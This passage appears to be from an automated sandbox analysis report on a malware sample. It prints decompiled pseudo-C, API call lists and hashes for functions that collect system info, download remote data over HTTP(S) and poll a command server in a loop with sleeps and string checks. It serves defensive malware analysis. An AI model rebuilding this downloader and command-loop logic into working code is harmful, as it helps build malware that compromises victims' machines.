                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memmove$Heap$AllocDirectoryInformationProcessVolumeWindowsXinvalid_argumentstd::_wsprintf
                                        • String ID: %08lX%04lX%lu-$:\$C$string too long
                                        • API String ID: 1185697149-3491094078
                                        • Opcode ID: 484d33e7350fb22ebf2ef8ca5b29c3eada7eb879582b8ff944bbec85ffd36a17
                                        • Instruction ID: 68b0f8525603ba0005fb17fe5221cd79f95fd690648c11fc7b1db77bfb739f84
                                        • Opcode Fuzzy Hash: 484d33e7350fb22ebf2ef8ca5b29c3eada7eb879582b8ff944bbec85ffd36a17
                                        • Instruction Fuzzy Hash: DBE1DE719052699BCB25CF28CD84BCABBB4BF18300F0046EDD549A7A41D770ABA5DFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA2E90 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E29DA2E90(intOrPtr* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				char _v48;
				intOrPtr _v52;
				struct _SYSTEM_INFO _v88;
				void* __ebx;
				void* __edi;
				signed int _t17;
				signed int _t18;
				intOrPtr* _t21;
				intOrPtr* _t22;
				intOrPtr _t31;
				intOrPtr _t33;
				void* _t41;
				intOrPtr _t42;
				intOrPtr* _t43;
				signed int _t44;
				void* _t48;

				_t48 = __eflags;
				_t43 = __esi;
				_push(0xffffffff);
				_push(E29DC2F28);
				_push( *[fs:0x0]);
				_t17 =  *0x29dd5664; // 0xd9555f04
				_t18 = _t17 ^ _t44;
				_v20 = _t18;
				_push(_t18);
				 *[fs:0x0] =  &_v16;
				_v52 = 0;
				GetSystemInfo( &_v88); // executed
				_t21 = E29DA4720( &_v48, _t48, _v88.dwNumberOfProcessors);
				_v8 = 0;
				if( *((intOrPtr*)(_t21 + 0x14)) < 0x10) {
					_t39 = _t21;
				} else {
					_t39 =  *_t21;
				}
				_t22 = _t39;
				 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t43 + 0x10)) = 0;
				 *_t43 = 0;
				_t11 = _t22 + 1; // 0x1
				_t41 = _t11;
				do {
					_t33 =  *_t22;
					_t22 = _t22 + 1;
				} while (_t33 != 0);
				E29D892C0(_t43, _t39, _t22 - _t41);
				if(_v28 >= 0x10) {
					_t39 = _v48;
					_push(_v48);
					E29DADF3B();
				}
				 *[fs:0x0] = _v16;
				_pop(_t42);
				_pop(_t31);
				return E29DADF46(_t43, _t31, _v20 ^ _t44, _t39, _t42, _t43);
			}























                                        0x29da2e90
                                        0x29da2e90
                                        0x29da2e93
                                        0x29da2e95
                                        0x29da2ea0
                                        0x29da2ea4
                                        0x29da2ea9
                                        0x29da2eab
                                        0x29da2eb0
                                        0x29da2eb4
                                        0x29da2ebe
                                        0x29da2ec5
                                        0x29da2ed2
                                        0x29da2ed9
                                        0x29da2ee0
                                        0x29da2ee6
                                        0x29da2ee2
                                        0x29da2ee2
                                        0x29da2ee2
                                        0x29da2ee8
                                        0x29da2eea
                                        0x29da2ef1
                                        0x29da2ef4
                                        0x29da2ef6
                                        0x29da2ef6
                                        0x29da2f00
                                        0x29da2f00
                                        0x29da2f02
                                        0x29da2f03
                                        0x29da2f0d
                                        0x29da2f16
                                        0x29da2f18
                                        0x29da2f1b
                                        0x29da2f1c
                                        0x29da2f21
                                        0x29da2f29
                                        0x29da2f31
                                        0x29da2f32
                                        0x29da2f40

                                        APIs
                                        • GetSystemInfo.KERNEL32(D9555F04,D9555F04,00000010,00000000), ref: 29DA2EC5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoSystem
                                        • String ID:
                                        • API String ID: 31276548-0
                                        • Opcode ID: c10801662114759129fc37b4c2aecffe57c61a552d3065ece15ad456e4cbd355
                                        • Instruction ID: 1c19868b77a299c14ad0d05cc2e15228f3c315d1ed0e20a904b0501bcfa08e7c
                                        • Opcode Fuzzy Hash: c10801662114759129fc37b4c2aecffe57c61a552d3065ece15ad456e4cbd355
                                        • Instruction Fuzzy Hash: 9B11E471A04288EFC714CF69D884BAFB7F9FB49700F10862DD91697640DB305A09CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D986A0 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 144networkmemoryfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1586 29d986a0-29d98741 call 29db5640 * 2 lstrlenA InternetCrackUrlA 1591 29d98748-29d98756 StrCmpCA 1586->1591 1592 29d98743 1586->1592 1593 29d98758 1591->1593 1594 29d9875b-29d98778 GetProcessHeap RtlAllocateHeap 1591->1594 1592->1591 1593->1594 1595 29d9877a 1594->1595 1596 29d9877d-29d987b2 InternetOpenA InternetSetOptionA 1594->1596 1595->1596 1597 29d987b4-29d987c5 1596->1597 1598 29d987c7-29d987d7 1596->1598 1599 29d987d8-29d987e8 InternetOpenUrlA 1597->1599 1598->1599 1600 29d9883a-29d98852 InternetCloseHandle * 2 1599->1600 1601 29d987ea 1599->1601 1603 29d98860-29d9887f call 29dadf46 1600->1603 1604 29d98854-29d9885d call 29dadf3b 1600->1604 1602 29d987f0-29d98812 InternetReadFile 1601->1602 1602->1600 1606 29d98814 1602->1606 1604->1603 1610 29d98820-29d98834 1606->1610 1610->1610 1611 29d98836-29d98838 1610->1611 1611->1600 1611->1602
                                        C-Code - Quality: 36%
                                        			E29D986A0(CHAR* __ecx, char* _a4, intOrPtr _a24) {
				long _v8;
				char _v16;
				signed int _v24;
				char _v88;
				void _v1112;
				long _v1116;
				void* _v1120;
				void _v1124;
				intOrPtr _v1176;
				char* _v1180;
				void* _v1184;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t36;
				signed int _t37;
				int _t44;
				char* _t45;
				void* _t46;
				void* _t48;
				char* _t49;
				void* _t50;
				void* _t53;
				void* _t61;
				void* _t63;
				void* _t64;
				void* _t65;
				long _t75;
				void* _t82;
				void* _t83;
				CHAR* _t85;
				void* _t86;
				void* _t87;
				signed int _t88;

				_push(0xffffffff);
				_push(E29DC1D58);
				_push( *[fs:0x0]);
				_t36 =  *0x29dd5664; // 0xd9555f04
				_t37 = _t36 ^ _t88;
				_v24 = _t37;
				_push(_t37);
				 *[fs:0x0] =  &_v16;
				_t85 = __ecx;
				_t63 = 0;
				_v8 = 0;
				_v1116 = 1;
				E29DB5640( &_v88, 0, 0x40);
				E29DB5640( &_v1184, 0, 0x3c);
				_v1184 = 0x3c;
				_v1180 =  &_v88;
				_v1176 = 0x40;
				_t44 = InternetCrackUrlA(_t85, lstrlenA(_t85), 0x10000000,  &_v1184);
				_t45 = _v1180;
				if(_t44 == 0) {
					_t45 = "http";
				}
				_t46 =  *0x29dd8550(_t45, "https");
				if(_t46 == 0) {
					_t13 = _t46 + 1; // 0x1
					_t63 = _t13;
				}
				_t48 = RtlAllocateHeap(GetProcessHeap(), 0, 0x5f5e0ff); // executed
				_t82 = _t48;
				_t49 = _a4;
				if(_a24 < 0x10) {
					_t49 =  &_a4;
				}
				_t50 = InternetOpenA(_t49, 0, 0, 0, 0);
				_v1120 = _t50;
				_v1124 = 0x927c0;
				InternetSetOptionA(_t50, 2,  &_v1124, 4);
				_push(0);
				if(_t63 == 0) {
					_push(0x4000100);
					_push(0);
					_push(0);
					_push(_t85);
					_push(_v1120);
				} else {
					_push(0x4800100);
					_push(0);
					_push(0);
					_push(_t85);
					_push(_v1120);
				}
				_t53 = InternetOpenUrlA();
				_t86 = 0;
				_t64 = _t53;
				if(_v1116 > 0) {
					while(1) {
						InternetReadFile(_t64,  &_v1112, 0x400,  &_v1116); // executed
						_t61 = 0;
						if(_v1116 <= 0) {
							goto L15;
						}
						do {
							 *((char*)(_t86 + _t82)) =  *((intOrPtr*)(_t88 + _t61 - 0x454));
							_t75 = _v1116;
							_t61 = _t61 + 1;
							_t86 = _t86 + 1;
						} while (_t61 < _t75);
						if(_t75 != 0) {
							continue;
						}
						goto L15;
					}
				}
				L15:
				InternetCloseHandle(_t64);
				InternetCloseHandle(_v1120);
				if(_a24 >= 0x10) {
					_push(_a4);
					E29DADF3B();
				}
				 *[fs:0x0] = _v16;
				_pop(_t83);
				_pop(_t87);
				_pop(_t65);
				return E29DADF46(_t82, _t65, _v24 ^ _t88, _t86, _t83, _t87);
			}





































                                        0x29d986a3
                                        0x29d986a5
                                        0x29d986b0
                                        0x29d986b7
                                        0x29d986bc
                                        0x29d986be
                                        0x29d986c4
                                        0x29d986c8
                                        0x29d986ce
                                        0x29d986d2
                                        0x29d986d8
                                        0x29d986e0
                                        0x29d986ea
                                        0x29d986f9
                                        0x29d98711
                                        0x29d9871b
                                        0x29d98721
                                        0x29d98733
                                        0x29d9873b
                                        0x29d98741
                                        0x29d98743
                                        0x29d98743
                                        0x29d9874e
                                        0x29d98756
                                        0x29d98758
                                        0x29d98758
                                        0x29d98758
                                        0x29d98769
                                        0x29d98773
                                        0x29d98775
                                        0x29d98778
                                        0x29d9877a
                                        0x29d9877a
                                        0x29d98786
                                        0x29d98798
                                        0x29d9879e
                                        0x29d987a8
                                        0x29d987ae
                                        0x29d987b2
                                        0x29d987cd
                                        0x29d987d2
                                        0x29d987d4
                                        0x29d987d6
                                        0x29d987d7
                                        0x29d987b4
                                        0x29d987ba
                                        0x29d987bf
                                        0x29d987c1
                                        0x29d987c3
                                        0x29d987c4
                                        0x29d987c4
                                        0x29d987d8
                                        0x29d987de
                                        0x29d987e0
                                        0x29d987e8
                                        0x29d987f0
                                        0x29d98804
                                        0x29d9880a
                                        0x29d98812
                                        0x00000000
                                        0x00000000
                                        0x29d98820
                                        0x29d98827
                                        0x29d9882a
                                        0x29d98830
                                        0x29d98831
                                        0x29d98832
                                        0x29d98838
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d98838
                                        0x29d987f0
                                        0x29d9883a
                                        0x29d9883b
                                        0x29d98848
                                        0x29d98852
                                        0x29d98857
                                        0x29d98858
                                        0x29d9885d
                                        0x29d98867
                                        0x29d9886f
                                        0x29d98870
                                        0x29d98871
                                        0x29d9887f

                                        APIs
                                        • _memset.LIBCMT ref: 29D986EA
                                        • _memset.LIBCMT ref: 29D986F9
                                        • lstrlenA.KERNEL32(?,10000000,00000000,?,?,D9555F04), ref: 29D9872B
                                        • InternetCrackUrlA.WININET(?,00000000), ref: 29D98733
                                        • StrCmpCA.SHLWAPI(?,https,?,?,D9555F04), ref: 29D9874E
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,D9555F04), ref: 29D98762
                                        • RtlAllocateHeap.NTDLL(00000000,?,?,D9555F04), ref: 29D98769
                                        • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 29D98786
                                        • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 29D987A8
                                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,04000100,00000000), ref: 29D987D8
                                        • InternetReadFile.WININET(00000000,?,00000400,00000001), ref: 29D98804
                                        • InternetCloseHandle.WININET(00000000), ref: 29D9883B
                                        • InternetCloseHandle.WININET(?), ref: 29D98848
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen_memset$AllocateCrackFileOptionProcessReadlstrlen
                                        • String ID: <$@$http$https
                                        • API String ID: 2133551499-3936193055
                                        • Opcode ID: 9cd574e058fe53d5c2b30120ba80d1c3b9db3041b118c1cb1911f1eadffcdc3b
                                        • Instruction ID: e7ca77dce8af06307bffbfbc72c538adc4e49d3394c314a6fbed2558de998fb5
                                        • Opcode Fuzzy Hash: 9cd574e058fe53d5c2b30120ba80d1c3b9db3041b118c1cb1911f1eadffcdc3b
                                        • Instruction Fuzzy Hash: D751E3B2A90258AFE710EF94CC85F9A77B8EB04B01F0084A9F609E7181DB746A45CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8ED40 Relevance: 28.6, APIs: 19, Instructions: 131memorystringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1612 29d8ed40-29d8ed86 GetProcessHeap RtlAllocateHeap lstrcatA call 29daea8e 1615 29d8ef08-29d8ef0c 1612->1615 1616 29d8ed8c-29d8ed90 1612->1616 1617 29d8ed93-29d8ed96 1616->1617 1618 29d8eee8-29d8ef00 call 29daea8e 1617->1618 1619 29d8ed9c 1617->1619 1618->1617 1644 29d8ef06-29d8ef07 1618->1644 1621 29d8ee48-29d8ee56 StrCmpCA 1619->1621 1622 29d8ee2a-29d8ee43 GetProcessHeap RtlAllocateHeap 1619->1622 1623 29d8ee0b-29d8ee19 StrCmpCA 1619->1623 1624 29d8edec-29d8edfa StrCmpCA 1619->1624 1625 29d8edcd-29d8eddb StrCmpCA 1619->1625 1626 29d8edae-29d8edbc StrCmpCA 1619->1626 1627 29d8ee7f-29d8ee8d StrCmpCA 1619->1627 1628 29d8eeaf-29d8eebd StrCmpCA 1619->1628 1629 29d8eda3-29d8eda9 1619->1629 1630 29d8ee67-29d8ee75 StrCmpCA 1619->1630 1631 29d8ee97-29d8eea5 StrCmpCA 1619->1631 1632 29d8eec7-29d8eedb GetProcessHeap RtlAllocateHeap 1619->1632 1621->1618 1641 29d8ee5c-29d8ee62 1621->1641 1635 29d8eee0-29d8eee2 lstrcatA 1622->1635 1623->1618 1640 29d8ee1f-29d8ee25 1623->1640 1624->1618 1639 29d8ee00-29d8ee06 1624->1639 1625->1618 1638 29d8ede1-29d8ede7 1625->1638 1626->1618 1637 29d8edc2-29d8edc8 1626->1637 1627->1618 1643 29d8ee8f-29d8ee95 1627->1643 1628->1618 1634 29d8eebf-29d8eec5 1628->1634 1629->1618 1630->1618 1642 29d8ee77-29d8ee7d 1630->1642 1631->1618 1633 29d8eea7-29d8eead 1631->1633 1632->1635 1633->1618 1634->1618 1635->1618 1637->1618 1638->1618 1639->1618 1640->1618 1641->1618 1642->1618 1643->1618 1644->1615
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0000EA60), ref: 29D8ED4E
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 29D8ED55
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D8ED62
                                        • _strtok_s.LIBCMT ref: 29D8ED7A
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EDB4
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EDD3
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EDF2
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EE11
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D8EE31
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 29D8EE38
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EE4E
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EE6D
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EE85
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EE9D
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EEB5
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D8EECE
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 29D8EED5
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D8EEE2
                                        • _strtok_s.LIBCMT ref: 29D8EEF2
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcess$_strtok_slstrcat
                                        • String ID:
                                        • API String ID: 2861863855-0
                                        • Opcode ID: 5764c25c5218a2588e8135c7b4bfa188f0cf1ce009526bfe756020f6cc4e256c
                                        • Instruction ID: 46679960e5a718cd28119e140303c78251f4ff964c842c4bc4768f17b6b07393
                                        • Opcode Fuzzy Hash: 5764c25c5218a2588e8135c7b4bfa188f0cf1ce009526bfe756020f6cc4e256c
                                        • Instruction Fuzzy Hash: A14184335C5282ABE343FA745805E9B3B6C7F25B82B84C56DF800E3906E6294607BB75
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D93E30 Relevance: 28.5, APIs: 13, Strings: 3, Instructions: 477sleepstringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1645 29d93e30-29d93e89 call 29db5640 lstrcatA 1648 29d93e90-29d93eee call 29d8e8b0 call 29d8e8e0 * 2 call 29d923b0 1645->1648 1657 29d93eff-29d93f26 1648->1657 1658 29d93ef0-29d93efc call 29dadf3b 1648->1658 1660 29d93f28 1657->1660 1661 29d93f2d-29d93f3b StrCmpCA 1657->1661 1658->1657 1660->1661 1663 29d93fcf-29d93fda 1661->1663 1664 29d93f41-29d93f79 call 29d8e910 1661->1664 1665 29d93fdc 1663->1665 1666 29d93fe1-29d93fef StrCmpCA 1663->1666 1673 29d93f80-29d93f85 1664->1673 1665->1666 1668 29d94563-29d9458f call 29d8e9a0 call 29d891d0 1666->1668 1669 29d93ff5-29d94053 call 29d8e940 call 29d8e8e0 * 2 call 29d923b0 1666->1669 1683 29d94591-29d9459d call 29dadf3b 1668->1683 1684 29d945a0-29d945ab call 29d8e910 1668->1684 1698 29d94055-29d94061 call 29dadf3b 1669->1698 1699 29d94064-29d94086 1669->1699 1673->1673 1676 29d93f87-29d93fc2 call 29d892c0 call 29d894c0 call 29d925a0 1673->1676 1696 29d93fc7-29d93fca 1676->1696 1683->1684 1697 29d945b2-29d945c4 call 29d891d0 1684->1697 1696->1663 1708 29d945d5-29d945f0 call 29dadf46 1697->1708 1709 29d945c6-29d945cc 1697->1709 1698->1699 1702 29d94088 1699->1702 1703 29d9408d-29d9409b StrCmpCA 1699->1703 1702->1703 1706 29d9412f-29d9413a 1703->1706 1707 29d940a1-29d940d9 call 29d8e910 1703->1707 1710 29d9413c 1706->1710 1711 29d94141-29d9414f StrCmpCA 1706->1711 1722 29d940e0-29d940e5 1707->1722 1713 29d945cd-29d945d2 call 29dadf3b 1709->1713 1710->1711 1715 29d9450f-29d9453b call 29d8e9a0 call 29d891d0 1711->1715 1716 29d94155-29d9418d call 29d8e910 1711->1716 1713->1708 1733 29d9453d-29d94549 call 29dadf3b 1715->1733 1734 29d9454c-29d94557 call 29d8e910 1715->1734 1728 29d94190-29d94195 1716->1728 1722->1722 1726 29d940e7-29d9412a call 29d892c0 call 29d894c0 call 29d925a0 1722->1726 1726->1706 1728->1728 1731 29d94197-29d941d5 call 29d892c0 call 29d8e970 call 29d925a0 1728->1731 1749 29d941dc-29d941ea StrCmpCA 1731->1749 1750 29d941d7 1731->1750 1733->1734 1734->1668 1751 29d944bb-29d944e7 call 29d8e9a0 call 29d891d0 1749->1751 1752 29d941f0-29d941fb 1749->1752 1750->1749 1767 29d944e9-29d944f5 call 29dadf3b 1751->1767 1768 29d944f8-29d94503 call 29d8e910 1751->1768 1754 29d941fd 1752->1754 1755 29d94202-29d94210 StrCmpCA 1752->1755 1754->1755 1757 29d94467-29d94493 call 29d8e9d0 call 29d891d0 1755->1757 1758 29d94216-29d94221 1755->1758 1785 29d94495-29d944a1 call 29dadf3b 1757->1785 1786 29d944a4-29d944b6 call 29d8ea00 1757->1786 1760 29d94228-29d94236 StrCmpCA 1758->1760 1761 29d94223 1758->1761 1764 29d9423c-29d94247 1760->1764 1765 29d943f4-29d94420 call 29d8ea00 call 29d891d0 1760->1765 1761->1760 1769 29d94249 1764->1769 1770 29d9424e-29d9425c StrCmpCA 1764->1770 1798 29d94431-29d94455 call 29d8ea00 call 29d891d0 1765->1798 1799 29d94422-29d9442e call 29dadf3b 1765->1799 1767->1768 1768->1715 1769->1770 1775 29d94381-29d943ad call 29d8ea00 call 29d891d0 1770->1775 1776 29d94262-29d9426d 1770->1776 1807 29d943af-29d943bb call 29dadf3b 1775->1807 1808 29d943be-29d943e2 call 29d8ea00 call 29d891d0 1775->1808 1782 29d9426f 1776->1782 1783 29d94274-29d94282 StrCmpCA 1776->1783 1782->1783 1791 29d94288-29d94293 1783->1791 1792 29d9432d-29d94359 call 29d8ea00 call 29d891d0 1783->1792 1785->1786 1786->1697 1793 29d9429a-29d942a8 StrCmpCA 1791->1793 1794 29d94295 1791->1794 1821 29d9435b-29d94367 call 29dadf3b 1792->1821 1822 29d9436a-29d9437c call 29d8ea00 1792->1822 1803 29d942ba-29d942e6 call 29d8ea00 call 29d891d0 1793->1803 1804 29d942aa-29d942b5 Sleep 1793->1804 1794->1793 1798->1708 1827 29d9445b-29d94462 1798->1827 1799->1798 1830 29d942e8-29d942f4 call 29dadf3b 1803->1830 1831 29d942f7-29d9431b call 29d8ea00 call 29d891d0 1803->1831 1804->1648 1807->1808 1808->1708 1834 29d943e8-29d943ef 1808->1834 1821->1822 1822->1697 1827->1713 1830->1831 1831->1708 1841 29d94321-29d94328 1831->1841 1834->1713 1841->1713
                                        C-Code - Quality: 28%
                                        			E29D93E30() {
				signed int _v8;
				char _v16;
				signed int _v20;
				char _v280;
				signed int _v288;
				char _v292;
				char _v308;
				intOrPtr _v316;
				char _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t137;
				signed int _t138;
				void* _t145;
				intOrPtr* _t149;
				intOrPtr* _t151;
				void* _t152;
				void* _t153;
				void* _t155;
				void* _t156;
				void* _t162;
				intOrPtr* _t166;
				intOrPtr* _t168;
				void* _t170;
				void* _t172;
				intOrPtr* _t175;
				intOrPtr* _t181;
				void* _t183;
				void* _t185;
				intOrPtr* _t188;
				void* _t190;
				intOrPtr* _t194;
				void* _t196;
				intOrPtr* _t199;
				void* _t201;
				intOrPtr* _t204;
				void* _t206;
				intOrPtr* _t210;
				signed int _t211;
				void* _t212;
				void* _t214;
				intOrPtr* _t217;
				intOrPtr* _t224;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				void* _t234;
				signed int _t235;
				signed int _t236;
				char* _t244;
				char* _t245;
				intOrPtr _t247;
				void* _t252;
				signed int _t267;
				void* _t272;
				signed int _t276;
				void* _t282;
				void* _t306;
				void* _t308;
				signed int _t309;
				void* _t310;
				void* _t312;
				intOrPtr _t313;
				intOrPtr _t314;
				void* _t315;
				intOrPtr _t317;
				intOrPtr _t318;
				intOrPtr _t319;
				char* _t320;
				intOrPtr _t321;
				intOrPtr _t322;
				char* _t323;
				char* _t324;
				intOrPtr _t325;
				char* _t326;
				char* _t327;
				void* _t330;
				void* _t334;
				void* _t337;
				void* _t341;
				void* _t344;
				void* _t346;
				void* _t348;
				void* _t350;
				void* _t352;
				void* _t354;

				_push(0xffffffff);
				_push(E29DC3104);
				_push( *[fs:0x0]);
				_t137 =  *0x29dd5664; // 0xd9555f04
				_t138 = _t137 ^ _t309;
				_v20 = _t138;
				_push(_t231);
				_push(_t138);
				 *[fs:0x0] =  &_v16;
				E29DB5640( &_v280, 0, 0x104);
				_t312 = _t310 - 0x14c + 0xc;
				_t238 =  &_v280;
				lstrcatA( &_v280, "/");
				_t232 = _t231 | 0xffffffff;
				_t328 = _t232;
				while(1) {
					_push("|");
					_t313 = _t312 - 0x1c;
					_v348 = _t313;
					E29D8E8B0(_t238, _t313);
					_t314 = _t313 - 0x1c;
					_v8 = 2;
					_v340 = _t314;
					E29D8E8E0(_t238, _t314);
					_v8 = 3;
					_t145 = E29D8E8E0(_t238,  &_v308);
					_v8 = 4;
					_push( *((intOrPtr*)(_t145 + 0x10)) + 1);
					_v8 = 5;
					E29D923B0(_t328); // executed
					_t267 = 0x10;
					_t315 = _t314 + 0x40;
					_v8 = _t232;
					if(_v288 >= 0x10) {
						_t246 = _v308;
						_push(_v308);
						E29DADF3B();
						_t315 = _t315 + 4;
					}
					_t149 =  *0x29dd62cc; // 0x2bab2a50
					_v288 = 0xf;
					_v292 = 0;
					_v308 = 0;
					_t330 =  *0x29dd62e0 - _t267; // 0x1f
					if(_t330 < 0) {
						_t149 = 0x29dd62cc;
					}
					_push("ERROR");
					_push(_t149);
					if( *0x29dd8550() == 0) {
						goto L9;
					}
					_t325 = _t315 - 0x1c;
					_v340 = _t325;
					E29D8E910(_t238, _t325);
					_t326 = _t325 - 0x1c;
					_v8 = 6;
					_t245 = _t326;
					_t224 =  &_v280;
					 *((intOrPtr*)(_t245 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t245 + 0x10)) = 0;
					_v348 = _t326;
					 *_t245 = 0;
					_t308 = _t224 + 1;
					do {
						_t246 =  *_t224;
						_t224 = _t224 + 1;
					} while (_t246 != 0);
					E29D892C0(_t245,  &_v280, _t224 - _t308);
					_t327 = _t326 - 0x1c;
					_t238 = _t327;
					_v8 = 7;
					_v344 = _t327;
					 *((intOrPtr*)(_t238 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t238 + 0x10)) = 0;
					 *_t238 = 0;
					E29D894C0(_t238, 0x29dd62cc, 0, _t232);
					_v8 = _t232;
					E29D925A0(); // executed
					_t315 = _t327 + 0x54;
					_t267 = 0x10;
					L9:
					_t151 =  *0x29dd62cc; // 0x2bab2a50
					_t334 =  *0x29dd62e0 - _t267; // 0x1f
					if(_t334 < 0) {
						_t151 = 0x29dd62cc;
					}
					_t152 =  *0x29dd8550(_t151, "ERROR");
					_t335 = _t152;
					if(_t152 != 0) {
						_t153 = E29D8E9A0(_t238,  &_v308);
						_v8 = 0x10;
						E29D891D0(_t153, "edit.zip");
						_v8 = _t232;
						_t233 = 0x10;
						__eflags = _v288 - 0x10;
						if(_v288 >= 0x10) {
							_push(_v308);
							E29DADF3B();
							_t315 = _t315 + 4;
						}
						_t155 = E29D8E910(_t238,  &_v308);
						_v8 = 0x11;
						goto L73;
					} else {
						_push("|");
						_t317 = _t315 - 0x1c;
						_v344 = _t317;
						E29D8E940(_t238, _t317);
						_t318 = _t317 - 0x1c;
						_v8 = 0xa;
						_v340 = _t318;
						E29D8E8E0(_t238, _t318);
						_v8 = 0xb;
						_t162 = E29D8E8E0(_t238,  &_v308);
						_v8 = 0xc;
						_push( *((intOrPtr*)(_t162 + 0x10)) + 1);
						_v8 = 0xd;
						E29D923B0(_t335);
						_t276 = 0x10;
						_t315 = _t318 + 0x40;
						_v8 = _t232;
						if(_v288 >= 0x10) {
							_t238 = _v308;
							_push(_v308);
							E29DADF3B();
							_t315 = _t315 + 4;
						}
						_t166 =  *0x29dd62cc; // 0x2bab2a50
						_v288 = 0xf;
						_v292 = 0;
						_v308 = 0;
						_t337 =  *0x29dd62e0 - _t276; // 0x1f
						if(_t337 < 0) {
							_t166 = 0x29dd62cc;
						}
						_push("ERROR");
						_push(_t166);
						if( *0x29dd8550() != 0) {
							_t322 = _t315 - 0x1c;
							_v344 = _t322;
							E29D8E910(_t238, _t322);
							_t323 = _t322 - 0x1c;
							_v8 = 0xe;
							_t244 = _t323;
							_t217 =  &_v280;
							 *((intOrPtr*)(_t244 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t244 + 0x10)) = 0;
							_v340 = _t323;
							 *_t244 = 0;
							_t306 = _t217 + 1;
							do {
								_t247 =  *_t217;
								_t217 = _t217 + 1;
							} while (_t247 != 0);
							_t246 =  &_v280;
							E29D892C0(_t244,  &_v280, _t217 - _t306);
							_t324 = _t323 - 0x1c;
							_t238 = _t324;
							_v8 = 0xf;
							_v348 = _t324;
							 *((intOrPtr*)(_t238 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t238 + 0x10)) = 0;
							 *_t238 = 0;
							E29D894C0(_t238, 0x29dd62cc, 0, _t232);
							_v8 = _t232;
							E29D925A0();
							_t315 = _t324 + 0x54;
							_t276 = 0x10;
						}
						_t168 =  *0x29dd62cc; // 0x2bab2a50
						_t341 =  *0x29dd62e0 - _t276; // 0x1f
						if(_t341 < 0) {
							_t168 = 0x29dd62cc;
						}
						_push("ERROR");
						_push(_t168);
						if( *0x29dd8550() != 0) {
							_t170 = E29D8E9A0(_t238,  &_v308);
							_v8 = 0x1a;
							E29D891D0(_t170, "edit.zip");
							_v8 = _t232;
							_t235 = 0x10;
							__eflags = _v288 - 0x10;
							if(_v288 >= 0x10) {
								_t238 = _v308;
								_push(_v308);
								E29DADF3B();
								_t315 = _t315 + 4;
							}
							_t172 = E29D8E910(_t238,  &_v308);
							_v8 = 0x1b;
							goto L59;
						} else {
							_t319 = _t315 - 0x1c;
							_v344 = _t319;
							E29D8E910(_t238, _t319);
							_t320 = _t319 - 0x1c;
							_v8 = 0x12;
							_t238 = _t320;
							_t175 =  &_v280;
							 *((intOrPtr*)(_t238 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t238 + 0x10)) = 0;
							_v340 = _t320;
							 *_t238 = 0;
							_t282 = _t175 + 1;
							do {
								_t246 =  *_t175;
								_t175 = _t175 + 1;
